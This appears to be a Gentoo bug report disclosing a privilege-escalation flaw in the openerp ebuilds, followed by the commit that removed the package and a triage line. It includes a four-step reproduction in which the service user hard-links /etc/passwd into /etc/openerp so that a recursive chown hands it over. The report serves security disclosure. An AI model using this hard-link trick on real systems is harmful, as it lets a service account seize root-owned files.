The openerp ebuilds call chown recursively on the live root filesystem in pkg_postinst: pkg_postinst() { chown -R ${OPENERP_USER}:${OPENERP_GROUP} /etc/openerp ... The "openerp" user can place a hard link in /etc/openerp pointing to a sensitive root-owned file, and the next time that openerp is emerged, that file will be given to the "openerp" user. For example, 1. emerge openerp 2. sudo su -s /bin/sh -c 'ln /etc/passwd /etc/openerp/x' openerp 3. emerge openerp 4. the file /etc/passwd is owned by openerp:openerp
This package was removed almost a year ago: commit 976bc8af740fe5b78ae71df52e3ca9ad73800051 Author: Virgil Dupras <vdupras@gentoo.org> Date: Wed Nov 7 07:22:14 2018 -0500 app-office/openerp: remove last-rited package and orphan dependency. Bug: https://bugs.gentoo.org/629270 Signed-off-by: Virgil Dupras <vdupras@gentoo.org> app-office/openerp/Manifest | 2 - app-office/openerp/files/openerp | 22 ----- app-office/openerp/files/openerp-2 | 23 ----- app-office/openerp/files/openerp-confd | 3 - app-office/openerp/files/openerp-confd-2 | 3 - app-office/openerp/files/openerp.cfg | 64 ------------- app-office/openerp/files/openerp.cfg.2 | 65 -------------- app-office/openerp/files/openerp.logrotate | 9 -- app-office/openerp/metadata.xml | 8 -- app-office/openerp/openerp-7.0.20140125.ebuild | 119 ------------------------- app-office/openerp/openerp-8.0.20140125.ebuild | 119 ------------------------- 11 files changed, 437 deletions(-)
unrestricting and re-assigning per bug 705894
